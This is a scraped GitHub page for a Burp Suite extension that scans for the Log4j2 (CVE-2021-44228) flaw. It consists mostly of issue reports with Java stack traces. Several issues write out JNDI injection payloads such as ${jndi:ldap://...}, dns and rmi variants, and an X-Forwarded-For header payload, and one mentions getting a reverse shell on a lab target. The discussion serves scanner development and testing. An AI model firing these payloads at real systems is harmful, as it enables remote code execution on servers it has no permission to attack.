f0ng / log4j2burpscanner Goto Github PK
View Code? Open in Web Editor NEWCVE-2021-44228 Log4j2 BurpSuite Scanner,Customize ceye.io api or other apis,including internal networks
Home Page: https://f0ng.github.io/2021/12/22/log4j2burpscanner/
log4j2burpscanner's Introduction
log4j2burpscanner's People
Contributors
Stargazers
Watchers
Forkers
imbrave99 kingz40o cainiao0 779789571 fanyibo2009 xingxingdangkongzhao explore-c ruanzy506 jeromeyoung timwhitez hanamaki99 qianniaoge jimsonzhang sec-fork laowang1026 awake-ui heywiorld idlefire lovelyjuice bearowang cuojue6 heiha7789 xdreamseeker admpri aboutbo miraclelau pen9un afwu kkiinnggwweenn saltfish-spectre cuteghost6 hukelasi wh0ale polaris-l wxx1b b0han711 61ue1azy r4ph4e1-0x01 god-mellon denrinswu functfan gysf666 yshdxm cl4ym0re rassec crackercat nannanshen li8u99 sesyi want2live233 yukar1z0e yougoglencoco nanaao msr00t ha99y-0320 go-bi huangzccn y1s3m0 vwvvw dk47os3r alilash-github skypoc ar39 titounkle lbcnp baisesecxxx nu1l1 ahlo666 superneilcn r1is guanchunguang patrickstarwow syslaowang f19t yx2124538 root13920 pyking 1294qqcom fostane sponkmonk balabalabala-zc t0s7 j5t4fun coopee1 cliffordwr idealdreamlast herewshow 10o0 5l1v3r1 bymezz mygit2014 xiaobei97 listenquiet jungley1 wangdadaya phdada 1in3r michaelcandoo fleabane1 ultramarine123log4j2burpscanner's Issues
报错
java.lang.NullPointerException: Cannot invoke "burp.IHttpRequestResponse.getHttpService()" because "this.currentlyDisplayedItem" is null
at burp.gpz.P(Unknown Source)
at burp.dzg.getHttpService(Unknown Source)
at burp.gn0.getHttpService(Unknown Source)
at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:151)
at burp.cio.a(Unknown Source)
at burp.fjz.a(Unknown Source)
at burp.fjz.a(Unknown Source)
at burp.a_p.a(Unknown Source)
at burp.g8.b(Unknown Source)
at burp.fjz.addNotify(Unknown Source)
at java.desktop/java.awt.Container.addImpl(Container.java:1146)
at java.desktop/javax.swing.JSplitPane.addImpl(JSplitPane.java:1009)
at java.desktop/java.awt.Container.add(Container.java:997)
at java.desktop/javax.swing.JSplitPane.setLeftComponent(JSplitPane.java:453)
at burp.fjo.d(Unknown Source)
at burp.fjo.b(Unknown Source)
at burp.fjo.a(Unknown Source)
at burp.fjo.lambda$layoutInitialised$2(Unknown Source)
at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:316)
at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:770)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:721)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:715)
at java.base/java.security.AccessController.doPrivileged(AccessController.java:391)
at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:85)
at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:740)
at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)
java.lang.NullPointerException: Cannot invoke "burp.IHttpRequestResponse.getHttpService()" because "this.currentlyDisplayedItem" is null
at burp.gpz.P(Unknown Source)
at burp.dzg.getHttpService(Unknown Source)
at burp.gn0.getHttpService(Unknown Source)
at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:151)
at burp.cio.a(Unknown Source)
at burp.fjz.a(Unknown Source)
at burp.fjz.a(Unknown Source)
at burp.a_p.a(Unknown Source)
at burp.g8.b(Unknown Source)
at burp.fjz.addNotify(Unknown Source)
at java.desktop/java.awt.Container.addImpl(Container.java:1146)
at java.desktop/javax.swing.JSplitPane.addImpl(JSplitPane.java:1009)
at java.desktop/java.awt.Container.add(Container.java:997)
at java.desktop/javax.swing.JSplitPane.setLeftComponent(JSplitPane.java:453)
at burp.fjo.d(Unknown Source)
at burp.fjo.b(Unknown Source)
at burp.fjo.a(Unknown Source)
at burp.fjo.lambda$layoutInitialised$2(Unknown Source)
at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:316)
at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:770)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:721)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:715)
at java.base/java.security.AccessController.doPrivileged(AccessController.java:391)
at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:85)
at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:740)
at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)
ERROR 报错信息
`java.lang.NullPointerException: Cannot invoke "burp.IHttpRequestResponse.getHttpService()" because "this.currentlyDisplayedItem" is null
at burp.aii.T(Unknown Source)
at burp.cnn.getHttpService(Unknown Source)
at burp.gvg.getHttpService(Unknown Source)
at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:128)
at burp.bpc.a(Unknown Source)
at burp.fno.a(Unknown Source)
at burp.dt2.a(Unknown Source)
at burp.dt2.a(Unknown Source)
at burp.jf.a(Unknown Source)
at burp.guy.a(Unknown Source)
at burp.dc4.b(Unknown Source)
at burp.jf.addNotify(Unknown Source)
at java.desktop/java.awt.Container.addNotify(Container.java:2801)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4792)
at java.desktop/java.awt.Container.addNotify(Container.java:2801)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4792)
at java.desktop/java.awt.Container.addNotify(Container.java:2801)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4792)
at java.desktop/java.awt.Container.addNotify(Container.java:2801)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4792)
at java.desktop/java.awt.Container.addNotify(Container.java:2801)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4792)
at java.desktop/java.awt.Container.addImpl(Container.java:1147)
at java.desktop/javax.swing.JTabbedPane.insertTab(JTabbedPane.java:760)
at burp.cd6.a(Unknown Source)
at burp.cd6.insertTab(Unknown Source)
at java.desktop/javax.swing.JTabbedPane.addTab(JTabbedPane.java:834)
at burp.bxg.a(Unknown Source)
at burp.guy.c(Unknown Source)
at burp.guy.a(Unknown Source)
at burp.ftr.a(Unknown Source)
at burp.d0t.addSuiteTab(Unknown Source)
at burp.i78.addSuiteTab(Unknown Source)
at burp.c04.addSuiteTab(Unknown Source)
at burp.BurpExtender$1.run(BurpExtender.java:863)
at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:316)
at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:770)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:721)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:715)
at java.base/java.security.AccessController.doPrivileged(AccessController.java:391)
at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:85)
at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:740)
at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)
java.lang.NullPointerException: Cannot invoke "burp.IHttpRequestResponse.getHttpService()" because "this.currentlyDisplayedItem" is null
at burp.aii.T(Unknown Source)
at burp.cnn.getHttpService(Unknown Source)
at burp.gvg.getHttpService(Unknown Source)
at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:128)
at burp.bpc.a(Unknown Source)
at burp.fno.a(Unknown Source)
at burp.dt2.a(Unknown Source)
at burp.dt2.a(Unknown Source)
at burp.jf.a(Unknown Source)
at burp.guy.a(Unknown Source)
at burp.dc4.b(Unknown Source)
at burp.jf.addNotify(Unknown Source)
at java.desktop/java.awt.Container.addNotify(Container.java:2801)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4792)
at java.desktop/java.awt.Container.addNotify(Container.java:2801)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4792)
at java.desktop/java.awt.Container.addNotify(Container.java:2801)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4792)
at java.desktop/java.awt.Container.addNotify(Container.java:2801)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4792)
at java.desktop/java.awt.Container.addNotify(Container.java:2801)
at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4792)
at java.desktop/java.awt.Container.addImpl(Container.java:1147)
at java.desktop/javax.swing.JTabbedPane.insertTab(JTabbedPane.java:760)
at burp.cd6.a(Unknown Source)
at burp.cd6.insertTab(Unknown Source)
at java.desktop/javax.swing.JTabbedPane.addTab(JTabbedPane.java:834)
at burp.bxg.a(Unknown Source)
at burp.guy.c(Unknown Source)
at burp.guy.a(Unknown Source)
at burp.ftr.a(Unknown Source)
at burp.d0t.addSuiteTab(Unknown Source)
at burp.i78.addSuiteTab(Unknown Source)
at burp.c04.addSuiteTab(Unknown Source)
at burp.BurpExtender$1.run(BurpExtender.java:863)
at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:316)
at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:770)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:721)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:715)
at java.base/java.security.AccessController.doPrivileged(AccessController.java:391)
at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:85)
at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:740)
at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)
`
插件不生效
加载插件后配置好配置,但是在截取数据包的过程中没有被动扫描log4j
好几个插件跟工具的作者都删了
你这边得小心了。不知道会不会影响到。建议弄个圈子群什么的内部发吧!上次说加个微信你都没回复我,你看看邮件。
测试了几个站点,只有第一个检测成功
在本地搭建的两个靶机(post请求),还有一个真实站点(get请求),依次手工测试都存在漏洞的,但是插件只检测到最开始的一个存在漏洞,后面的两个站都没有检测到
关于部分的优化建议
1.内网很多时候不会特意搭建dnslog来测试,更多的是直接启用jndi服务然后存在漏洞的资产主动回连你所设置的ldap/rmi://ip:port/xxx。插件的设置只支持内网的dnslog格式而且不带域名解析的情况下生成的参数根本无法正常访问。目标机子没有你的域名解析记录,所以只能是完整的IP格式
错误的:${jndi:dns://0.POST.192.168.80.10.hello.192.168.80.6:8001/%20test}
正确的:${jndi:dns://192.168.80.6:8001/%20test}
这样的情况就会出现没办法定位漏洞参数位置,但是可以找到存在漏洞。需要进一步手工一个一个参数测试。不能依靠域名解析时候携带的数字编号进行快速定位了。这部分的优化时可以把内网的dnslog配置直接用ip:port的方式代替,出不出网都没办法解析到你私有化部署的dnslog。
2.还有dns改rmi发送的payload还是dns。改ldap干脆就不发送了。干脆3个轮流遍历一遍这样能省去很多时间,特别面对众多资产的时候3个参数轮着改还要所有访问再执行一遍效率很低。你可以加个开关要么指定要么默认3个都测试一遍。
3.{jndi:dns://0.POST.d63bb2586.lab.aqlab.cn.zkaq.log4jrce.xxx.ceye.io/%20test POST.d63bb2586.lab.aqlab.cn.zkaq.log4jrce. 这部分有点多余是不是可以考虑简化一下,万一域名带奇怪的内容反而回连时触发了安全设备的规则。保留数字的部分0.xxx.ceye.io/%20test即可。
4.jndi:绕过的几个格式都加入到默认发送的状态,保证漏洞定位的准确性。
0.16.7版本打payload会把"$" URL编码,会导致payload无法被加载
在靶场中测试,0.16.7版本打payload会把"$" URL编码,会导致payload无法被加载。
导入插件后报错
jdk版本也换过了,是编译的问题吗??
java.lang.NullPointerException at burp.dcb.O(Unknown Source) at burp.cz8.getHttpService(Unknown Source) at burp.hy.getHttpService(Unknown Source) at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:149) at burp.hmr.a(Unknown Source) at burp.bp4.b(Unknown Source) at burp.gj_.a(Unknown Source) at burp.gj_.a(Unknown Source) at burp.dmr.a(Unknown Source) at burp.cup.a(Unknown Source) at burp.ifl.a(Unknown Source) at burp.dmr.addNotify(Unknown Source) at java.desktop/java.awt.Container.addNotify(Container.java:2800) at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783) at java.desktop/java.awt.Container.addNotify(Container.java:2800) at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783) at java.desktop/java.awt.Container.addNotify(Container.java:2800) at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783) at java.desktop/java.awt.Container.addNotify(Container.java:2800) at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783) at java.desktop/java.awt.Container.addNotify(Container.java:2800) at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783) at java.desktop/java.awt.Container.addImpl(Container.java:1146) at java.desktop/javax.swing.JTabbedPane.insertTab(JTabbedPane.java:754) at burp.gm0.a(Unknown Source) at burp.gm0.insertTab(Unknown Source) at java.desktop/javax.swing.JTabbedPane.addTab(JTabbedPane.java:828) at burp.d0z.a(Unknown Source) at burp.cup.a(Unknown Source) at burp.cup.b(Unknown Source) at burp.d0w.a(Unknown Source) at burp.iew.addSuiteTab(Unknown Source) at burp.fvi.addSuiteTab(Unknown Source) at burp.exn.addSuiteTab(Unknown Source) at burp.BurpExtender$1.run(BurpExtender.java:292) at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:313) at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:770) at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:721) at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:715) at java.base/java.security.AccessController.doPrivileged(AccessController.java:391) at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:85) at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:740) at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203) at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124) at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113) at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109) at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101) at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90) java.lang.NullPointerException at burp.dcb.O(Unknown Source) at burp.cz8.getHttpService(Unknown Source) at burp.hy.getHttpService(Unknown Source) at burp.BurpExtender$MarkInfoTab.isEnabled(BurpExtender.java:149) at burp.hmr.a(Unknown Source) at burp.bp4.b(Unknown Source) at burp.gj_.a(Unknown Source) at burp.gj_.a(Unknown Source) at burp.dmr.a(Unknown Source) at burp.cup.a(Unknown Source) at burp.ifl.a(Unknown Source) at burp.dmr.addNotify(Unknown Source) at java.desktop/java.awt.Container.addNotify(Container.java:2800) at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783) at java.desktop/java.awt.Container.addNotify(Container.java:2800) at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783) at java.desktop/java.awt.Container.addNotify(Container.java:2800) at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783) at java.desktop/java.awt.Container.addNotify(Container.java:2800) at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783) at java.desktop/java.awt.Container.addNotify(Container.java:2800) at java.desktop/javax.swing.JComponent.addNotify(JComponent.java:4783) at java.desktop/java.awt.Container.addImpl(Container.java:1146) at java.desktop/javax.swing.JTabbedPane.insertTab(JTabbedPane.java:754) at burp.gm0.a(Unknown Source) at burp.gm0.insertTab(Unknown Source) at java.desktop/javax.swing.JTabbedPane.addTab(JTabbedPane.java:828) at burp.d0z.a(Unknown Source) at burp.cup.a(Unknown Source) at burp.cup.b(Unknown Source) at burp.d0w.a(Unknown Source) at burp.iew.addSuiteTab(Unknown Source) at burp.fvi.addSuiteTab(Unknown Source) at burp.exn.addSuiteTab(Unknown Source) at burp.BurpExtender$1.run(BurpExtender.java:292) at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:313) at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:770) at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:721) at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:715) at java.base/java.security.AccessController.doPrivileged(AccessController.java:391) at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:85) at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:740) at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203) at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124) at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113) at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109) at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101) at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90) java.lang.ClassCastException: class com.alibaba.fastjson.JSONArray cannot be cast to class com.alibaba.fastjson.JSONObject (com.alibaba.fastjson.JSONArray and com.alibaba.fastjson.JSONObject are in unnamed module of loader burp.bci @2f1b95d8) at com.alibaba.fastjson.JSON.parseObject(JSON.java:247) at burp.BurpExtender.doPassiveScan(BurpExtender.java:535) at burp.hs6.run(Unknown Source) at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515) at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264) at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128) at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628) at java.base/java.lang.Thread.run(Thread.java:830) java.lang.ClassCastException: class com.alibaba.fastjson.JSONArray cannot be cast to class com.alibaba.fastjson.JSONObject (com.alibaba.fastjson.JSONArray and com.alibaba.fastjson.JSONObject are in unnamed module of loader burp.bci @2f1b95d8) at com.alibaba.fastjson.JSON.parseObject(JSON.java:247) at burp.BurpExtender.doPassiveScan(BurpExtender.java:535) at burp.hs6.run(Unknown Source) at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515) at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264) at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128) at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628) at java.base/java.lang.Thread.run(Thread.java:830) com.alibaba.fastjson.JSONException: not close json text, token : int at com.alibaba.fastjson.parser.DefaultJSONParser.close(DefaultJSONParser.java:1527) at com.alibaba.fastjson.JSON.parse(JSON.java:174) at com.alibaba.fastjson.JSON.parse(JSON.java:180) at com.alibaba.fastjson.JSON.parse(JSON.java:149) at com.alibaba.fastjson.JSON.parseObject(JSON.java:241) at burp.BurpExtender.doPassiveScan(BurpExtender.java:475) at burp.hs6.run(Unknown Source) at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515) at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264) at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128) at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628) at java.base/java.lang.Thread.run(Thread.java:830) java.lang.ClassCastException: class com.alibaba.fastjson.JSONArray cannot be cast to class com.alibaba.fastjson.JSONObject (com.alibaba.fastjson.JSONArray and com.alibaba.fastjson.JSONObject are in unnamed module of loader burp.bci @2f1b95d8) at com.alibaba.fastjson.JSON.parseObject(JSON.java:247) at burp.BurpExtender.doPassiveScan(BurpExtender.java:535) at burp.hs6.run(Unknown Source) at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515) at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264) at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128) at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628) at java.base/java.lang.Thread.run(Thread.java:830)
cant seem to find the passive option
cant seem to find the passive option diplayed on the git
https://user-images.githubusercontent.com/48286013/146666473-83b53bfe-7a41-4379-b22c-a1085125e2e7.png
用法咨询
研究了半天没发现咋用,有没有表哥带带我
这个插件是自动执行的么,我只需要抓包即可?
cant see dns log on dns.1433.eu.org
I tried using your extension to double check on domain test, but can't see dns record and error message.
新版本的payload搞错了吧😅
将white list 白名单置空,似乎会导致插件不会对任何host进行被动扫描?
问题
貌似awvs代理过来的流量和burp自带的爬虫插件都没法加payload,手动勾重放器测试是可以的
打错字了
包头里各种 Content-Type、Referer、Accept-Language、Accept、Accept-Encoding等都有可能成为触发点,望加入检测范围,感谢。
在最新的版本中dns协议是生效的,但是payload没有处理好,从log4j打印的日志来看,payload多了1个点
这使dns log收不到请求
提两个建议
第一个是建议添加一个对请求头的参数都进行测试的功能,因为在使用过程中发现有些请求头并不在选项里面,但是是有漏洞的,比如vulfocus靶场新加了一个x-api-version的请求头存在漏洞,但是插件不扫描。
第二个是判断依据的问题,我在测试靶场这个参数的时候,发现其它参数存在漏洞有dnslog回显,但是响应包是406,结果就不报这个漏洞点。
测试发现部分漏洞站点对jndi:dns://无反应
但是对jndi:ldap://有反应
针对xml数据检测
针对xml数据检测
payload建议的改进
0.15更新
1.增加dns与ldap可选 少了rmi的我之前在某个帖子回复你添加,估计你没看到。
目前插件支持的payload格式是${jndi:ldap://xxx.ceye.io/test} ${jndi:dns://xxx.ceye.io/test} 由于漏洞服务器JDK和组件的问题${jndi:rmi://xxx.ceye.io/test} 这个缺了。vulfocus的靶机就是用这个payload反弹shell成功了。
意味着Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
用的是JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar。
X-Forwarded-For请求头
插件现在的X-Forwarded-For的payload是:
X-Forwarded-For: 127.0.0.1,${jndi:dns://14.xxxxxxxxxxx
目前我遇到的情况就是X-Forwarded-For是存在漏洞的,可是添加了“127.0.0.1,”后漏洞测试不成功。
建议变成X-Forwarded-For:payload
直接去除“127.0.0.1,”或者添加多一种情况
右键发送log4j2问题
大佬,右键发送log4j2没有反应,看到了您对其他人的回复,测试了您所使用的jdk版本,也存在同样的问题,盼复。
为什么右键按钮Send to log4j2 Scanner后插件界面是空的,好像就没有扫描
为什么右键按钮Send to log4j2 Scanner后插件界面是空的,好像扫描失效,试了很多次还是这样,求解答~
刚发现的问题
靶场就刚才我邮件发你的那个,我配置了ceye.io的域名dns收到请求了但是插件没有提示有漏洞。图片我通过邮件发你了。还有采用默认的dnslog就检测到一次,接来下全部都没有检测出来。具体原因不清楚可能需要你自测一下。我邮箱把图片发你,你看看。
网站执行太慢好像会检测不出
如图,已经回显成功了,但是响应速度不是很快,插件则没有检测出。
有报错信息
java.lang.NullPointerException
at burp.BurpExtender.doPassiveScan(BurpExtender.java:1845)
at burp.g6d.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:832)
java.lang.NullPointerException
at burp.BurpExtender.doPassiveScan(BurpExtender.java:1845)
at burp.g6d.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:832)
java.lang.ClassCastException: class com.alibaba.fastjson.JSONArray cannot be cast to class com.alibaba.fastjson.JSONObject (com.alibaba.fastjson.JSONArray and com.alibaba.fastjson.JSONObject are in unnamed module of loader burp.gec @4981b30e)
at com.alibaba.fastjson.JSON.parseObject(JSON.java:259)
at burp.BurpExtender.doPassiveScan(BurpExtender.java:1474)
at burp.g6d.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:832)
java.lang.NullPointerException
at burp.BurpExtender.doPassiveScan(BurpExtender.java:1845)
at burp.g6d.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:832)
java.lang.ClassCastException: class com.alibaba.fastjson.JSONArray cannot be cast to class com.alibaba.fastjson.JSONObject (com.alibaba.fastjson.JSONArray and com.alibaba.fastjson.JSONObject are in unnamed module of loader burp.gec @4981b30e)
at com.alibaba.fastjson.JSON.parseObject(JSON.java:259)
at burp.BurpExtender.doPassiveScan(BurpExtender.java:1477)
at burp.g6d.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:832)
java.lang.ClassCastException: class com.alibaba.fastjson.JSONArray cannot be cast to class com.alibaba.fastjson.JSONObject (com.alibaba.fastjson.JSONArray and com.alibaba.fastjson.JSONObject are in unnamed module of loader burp.gec @4981b30e)
at com.alibaba.fastjson.JSON.parseObject(JSON.java:259)
at burp.BurpExtender.doPassiveScan(BurpExtender.java:1477)
at burp.g6d.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:832)
java.lang.ClassCastException: class com.alibaba.fastjson.JSONArray cannot be cast to class com.alibaba.fastjson.JSONObject (com.alibaba.fastjson.JSONArray and com.alibaba.fastjson.JSONObject are in unnamed module of loader burp.gec @4981b30e)
at com.alibaba.fastjson.JSON.parseObject(JSON.java:259)
at burp.BurpExtender.doPassiveScan(BurpExtender.java:1477)
at burp.g6d.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630)
at java.base/java.lang.Thread.run(Thread.java:832)
java.lang.ClassCastException: class com.alibaba.fastjson.JSONArray cannot be cast to class com.alibaba.fastjson.JSONObject (com.alibaba.fastjson.JSONArray and com.alibaba.fastjson.JSONObject are in unnamed module of loader burp.gec @4981b30e)
at com.alibaba.fastjson.JSON.parseObject(JSON.java:259)
at burp.BurpExtender.doPassiveScan(BurpExtender.java:1477)
at burp.g6d.run(Unknown Source)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
